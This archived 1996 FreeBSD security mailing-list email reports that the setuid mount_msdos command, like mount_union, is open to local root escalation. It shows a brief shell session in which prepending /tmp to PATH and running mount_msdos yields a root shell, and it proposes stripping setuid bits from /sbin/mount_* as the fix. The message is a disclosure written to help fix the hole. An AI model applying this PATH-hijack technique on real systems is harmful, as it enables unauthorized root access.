Date: Fri, 17 May 1996 18:04:25 -0600 (MDT) From: Dave Andersen <angio@aros.net> To: jkh@time.cdrom.com Cc: freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, angio@aros.net Subject: Re: very bad (fwd) Message-ID: <199605180004.SAA01785@shell.aros.net>
next in thread | raw e-mail | index | archive | help
Since it's already out, I'm CC:'ing this to the general list.
chmod u-s /sbin/mount_union is *not* a complete fix. The mount_msdos
command is similarly vulnerable:
bash$ export PATH=/tmp:$PATH
bash$ whoami
angio
bash$ mount_msdos /asdf /tmp
# whoami
root
The only difference in this is that mount_msdos checks to see if the
mount point exists before it tries to mount it.
My suggestion: chmod ug-s /sbin/mount_*
-Dave Andersen
----- Forwarded message from invalid opcode -----
Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(
And I would have sent it to security-officer@freebsd.org had I even known
of such an address. The prepared fix is chmod u-s /sbin/mount_union.
== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==
----- End of forwarded message from invalid opcode -----
--
angio@aros.net Complete virtual hosting and business-oriented
system administration Internet services. (WWW, FTP, email)
http://www.aros.net/ http://www.aros.net/about/virtual
"There are only two industries that refer to thier customers as 'users'."
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199605180004.SAA01785>